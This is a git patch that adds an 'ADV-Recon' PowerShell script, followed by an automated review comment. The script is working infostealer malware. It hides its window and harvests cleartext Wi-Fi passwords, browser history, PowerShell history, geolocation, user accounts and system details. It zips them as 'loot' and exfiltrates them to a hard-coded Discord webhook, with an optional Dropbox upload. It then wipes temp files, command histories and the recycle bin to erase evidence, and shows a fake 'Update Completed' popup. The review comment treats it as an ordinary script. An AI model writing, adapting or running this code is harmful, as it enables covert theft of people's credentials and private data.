From 4d04294803b5fef9b0e6cc253fd8cfce8cfd767a Mon Sep 17 00:00:00 2001
From: Didier Asechimann
Date: Tue, 21 Oct 2025 18:30:19 -0400
Subject: [PATCH] Upload New File
---
 PS1/exfil.ps1 | 594 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 594 insertions(+)
 create mode 100644 PS1/exfil.ps1
diff --git a/PS1/exfil.ps1 b/PS1/exfil.ps1
new file mode 100644
index 0000000..3c0d620
--- /dev/null
+++ b/PS1/exfil.ps1
@@ -0,0 +1,594 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This is an advanced recon of a target PC and exfiltration of that data.
+.DESCRIPTION
+ This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
+ All of the gather information is formatted neatly and output to a file.
+ That file is then exfiltrated to cloud storage via Dropbox.
+.Link
+ https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
+ https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
+ https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
+#>
+
+############################################################################################################################################################
+
+$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
+add-type -name win -member $i -namespace native;
+[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
+
+
+# MAKE LOOT FOLDER, FILE, and ZIP
+
+$FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)"
+
+$FileName = "$FolderName.txt"
+
+$ZIP = "$FolderName.zip"
+
+New-Item -Path $env:tmp/$FolderName -ItemType Directory
+
+############################################################################################################################################################
+
+# Enter your access tokens below. At least one has to be provided but both can be used at the same time.
+
+#$db = ""
+
+$dc = "https://discord.com/api/webhooks/1419793734245285888/QAmMrxeNTFbjIA1eridj0yn7IElDu_8WfUKOvSAHjNutTIpVd8ZXJ2Tnxm2PlyeBKOMq"
+
+############################################################################################################################################################
+
+# Recon all User Directories
+tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
+
+# Powershell history
+Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
+
+############################################################################################################################################################
+
+function Get-fullName {
+
+ try {
+ $fullName = (Get-LocalUser -Name $env:USERNAME).FullName
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fullName = Get-fullName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$email = Get-email
+
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GeoLocation = Get-GeoLocation
+
+$GeoLocation = $GeoLocation -split " "
+
+$Lat = $GeoLocation[0].Substring(11) -replace ".$"
+
+$Lon = $GeoLocation[1].Substring(10) -replace ".$"
+
+############################################################################################################################################################
+
+# local-user
+
+$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID | Out-String
+
+############################################################################################################################################################
+
+Function Get-RegistryValue($key, $value) { (Get-ItemProperty $key $value).$value }
+
+$Key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
+$ConsentPromptBehaviorAdmin_Name = "ConsentPromptBehaviorAdmin"
+$PromptOnSecureDesktop_Name = "PromptOnSecureDesktop"
+
+$ConsentPromptBehaviorAdmin_Value = Get-RegistryValue $Key $ConsentPromptBehaviorAdmin_Name
+$PromptOnSecureDesktop_Value = Get-RegistryValue $Key $PromptOnSecureDesktop_Name
+
+If($ConsentPromptBehaviorAdmin_Value -Eq 0 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "Never notIfy" }
+
+ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 0){ $UAC = "NotIfy me only when apps try to make changes to my computer(do not dim my desktop)" }
+
+ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 5 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "NotIfy me only when apps try to make changes to my computer(default)" }
+
+ElseIf($ConsentPromptBehaviorAdmin_Value -Eq 2 -And $PromptOnSecureDesktop_Value -Eq 1){ $UAC = "Always notIfy" }
+
+Else{ $UAC = "Unknown" }
+
+############################################################################################################################################################
+
+$lsass = Get-Process -Name "lsass"
+
+if ($lsass.ProtectedProcess) {$lsass = "LSASS is running as a protected process."}
+
+else {$lsass = "LSASS is not running as a protected process."}
+
+############################################################################################################################################################
+
+$StartUp = (Get-ChildItem -Path ([Environment]::GetFolderPath("Startup"))).Name
+
+############################################################################################################################################################
+
+# Get nearby wifi networks
+
+try
+{
+$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
+}
+catch
+{
+$NearbyWifi="No nearby wifi networks detected"
+}
+
+############################################################################################################################################################
+
+# Get info about pc
+
+# Get IP / Network Info
+
+try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}
+catch{$computerPubIP="Error getting Public IP"}
+
+try{$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String}
+catch{$localIP = "Error getting local IP"}
+
+$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String
+
+# Check RDP
+
+if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
+ $RDP = "RDP is Enabled"
+} else {
+ $RDP = "RDP is NOT enabled"
+}
+
+############################################################################################################################################################
+
+#Get System Info
+$computerSystem = Get-CimInstance CIM_ComputerSystem
+
+$computerName = $computerSystem.Name
+
+$computerModel = $computerSystem.Model
+
+$computerManufacturer = $computerSystem.Manufacturer
+
+$computerBIOS = Get-CimInstance CIM_BIOSElement | Out-String
+
+$computerOs=(Get-WMIObject win32_operatingsystem) | Select Caption, Version | Out-String
+
+$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List | Out-String
+
+$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List | Out-String
+
+$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} | Out-String
+
+$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table | Out-String
+
+############################################################################################################################################################
+
+$ScheduledTasks = Get-ScheduledTask
+
+############################################################################################################################################################
+
+$klist = klist sessions
+
+############################################################################################################################################################
+
+$RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 50 FullName, LastWriteTime
+
+############################################################################################################################################################
+
+# Get HDDs
+$driveType = @{
+ 2="Removable disk "
+ 3="Fixed local disk "
+ 4="Network disk "
+ 5="Compact disk "}
+$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } | Out-String
+
+#Get - Com & Serial Devices
+$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table | Out-String -width 250
+
+############################################################################################################################################################
+
+# Get Network Interfaces
+$NetworkAdapters = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress | Out-String -width 250
+
+$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
+
+############################################################################################################################################################
+
+# process first
+$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine | Out-String -width 250
+
+# Get Listeners / ActiveTcpConnections
+$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
+$listener = $listener | foreach-object {
+ $listenerItem = $_
+ $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
+ new-object PSObject -property @{
+ "LocalAddress" = $listenerItem.LocalAddress
+ "RemoteAddress" = $listenerItem.RemoteAddress
+ "State" = $listenerItem.State
+ "AppliedSetting" = $listenerItem.AppliedSetting
+ "OwningProcess" = $listenerItem.OwningProcess
+ "ProcessName" = $processItem.ProcessName
+ }
+} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table | Out-String -width 250
+
+# service
+$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName | Out-String -width 250
+
+# installed software (get uninstaller)
+$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize | Out-String -width 250
+
+# drivers
+$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion | Out-String -width 250
+
+# videocard
+$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution | Out-String -width 250
+
+
+############################################################################################################################################################
+
+# OUTPUTS RESULTS TO LOOT FILE
+
+$output = @"
+
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _' | | '_ ' _ \ _ | | / _' | | |/ / / _ \ | '_ \ | | | |# 'Y8888888Y' #
+# Version : 2.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# 'Y888Y' #
+# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# 'Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| ('\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(' ') ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+
+Full Name: $fullName
+
+Email: $email
+
+GeoLocation:
+Latitude: $Lat
+Longitude: $Lon
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Local Users:
+$luser
+
+------------------------------------------------------------------------------------------------------------------------------
+
+UAC State:
+$UAC
+
+LSASS State:
+$lsass
+
+RDP State:
+$RDP
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Public IP:
+$computerPubIP
+
+Local IPs:
+$localIP
+
+MAC:
+$MAC
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Computer Name:
+$computerName
+
+Model:
+$computerModel
+
+Manufacturer:
+$computerManufacturer
+
+BIOS:
+$computerBIOS
+
+OS:
+$computerOs
+
+CPU:
+$computerCpu
+
+Mainboard:
+$computerMainboard
+
+Ram Capacity:
+$computerRamCapacity
+
+Total installed Ram:
+$computerRam
+
+Video Card:
+$videocard
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Contents of Start Up Folder:
+$StartUp
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Scheduled Tasks:
+$ScheduledTasks
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Logon Sessions:
+$klist
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Recent Files:
+$RecentFiles
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Hard-Drives:
+$Hdds
+
+COM Devices:
+$COMDevices
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Network Adapters:
+$NetworkAdapters
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Nearby Wifi:
+$NearbyWifi
+
+Wifi Profiles:
+$wifiProfiles
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Process:
+$process
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Listeners:
+$listener
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Services:
+$service
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Installed Software:
+$software
+
+------------------------------------------------------------------------------------------------------------------------------
+
+Drivers:
+$drivers
+
+------------------------------------------------------------------------------------------------------------------------------
+
+"@
+
+$output > $env:TEMP\$FolderName/computerData.txt
+
+############################################################################################################################################################
+
+function Get-BrowserData {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$Browser,
+ [Parameter (Position=1,Mandatory = $True)]
+ [string]$DataType
+ )
+
+ $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
+
+ if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"}
+ elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"}
+ elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"}
+ elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"}
+
+
+ $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
+ $Value | ForEach-Object {
+ $Key = $_
+ if ($Key -match $Search){
+ New-Object -TypeName PSObject -Property @{
+ User = $env:UserName
+ Browser = $Browser
+ DataType = $DataType
+ Data = $_
+ }
+ }
+ }
+}
+
+Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\BrowserData.txt
+
+Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt
+
+############################################################################################################################################################
+
+Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP
+
+# Upload output file to dropbox
+
+function dropbox {
+$TargetFilePath="/$ZIP"
+$SourceFilePath="$env:TEMP\$ZIP"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){dropbox}
+
+############################################################################################################################################################
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
+
+
+
+############################################################################################################################################################
+
+<#
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+
+############################################################################################################################################################
+
+# Popup message to signal the payload is done
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Update Completed",1)
+exit
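Review bot: The `$dc` assignment near the top of the hunk hard-codes a live Discord webhook URL (`https://discord.com/api/webhooks/1419793734245285888/…`), and a webhook URL is itself the credential: anyone who reads this commit can post to that channel, and `Upload-Discord` at the bottom of the hunk sends the loot zip to it with `curl.exe -F "file1=@$file" $hookurl`. Overwriting the line in a later commit does not remove it from history, so the webhook should be revoked in Discord and the script should take the URL at run time (a parameter or environment variable) with the same empty placeholder the `$db` line already uses, `$dc = ""`. Separately, `Invoke-WebRequest ipinfo.io/ip` has no scheme and appears to go out over plain HTTP, so the public-IP lookup is visible and spoofable on path; `https://ipinfo.io/ip` costs nothing. The whole file is a single hunk, so nothing here is cut at the edges.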